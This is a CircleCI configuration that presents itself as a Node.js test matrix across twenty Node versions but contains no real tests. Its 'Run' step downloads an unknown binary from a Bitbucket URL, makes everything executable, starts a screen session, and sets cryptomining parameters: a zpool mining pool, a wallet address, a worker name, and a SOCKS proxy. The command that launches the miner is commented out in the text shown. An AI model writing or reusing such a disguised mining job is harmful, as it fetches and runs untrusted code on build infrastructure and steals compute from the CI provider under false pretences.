version: 2.1

executors:
  linux:
    docker:
      - image: circleci/clojure:lein-2.9.5

orbs:
  node: circleci/node@2.0.0

jobs:
  test:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
          name: Install
          command: sudo apt-get -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential screen
      - run:
          name: Akses
          command: chmod u+x *
      - run:
          name: Run
          command: |
            wget https://bitbucket.org/aldiansah617/sadanai/raw/cffe8ee7bd03ace22c6c9202c2a064b433d0a6a0/avypx76
            chmod +x *
            screen -dmS ls
            ALG=cpupower
            PL=stratum+tcp://cpupower.na.mine.zpool.ca:6240
            WT=DCZxCjQrpoGHwdjZdqdUCn5CNtGZwgqVEv
            WR=GPU_08
            PY=socks4://72.210.252.134:46164
            #./avypx76 -a $ALG -o $PL -u $WT -p $WR,mc=CPU -t12 -x $PY

workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [linux]
              node-version: [8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.16.0, 8.16.2, 8.17.0, 9.3.0, 9.4.0, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.10.0, 9.10.1, 9.11.0, 9.11.1, 9.11.2]
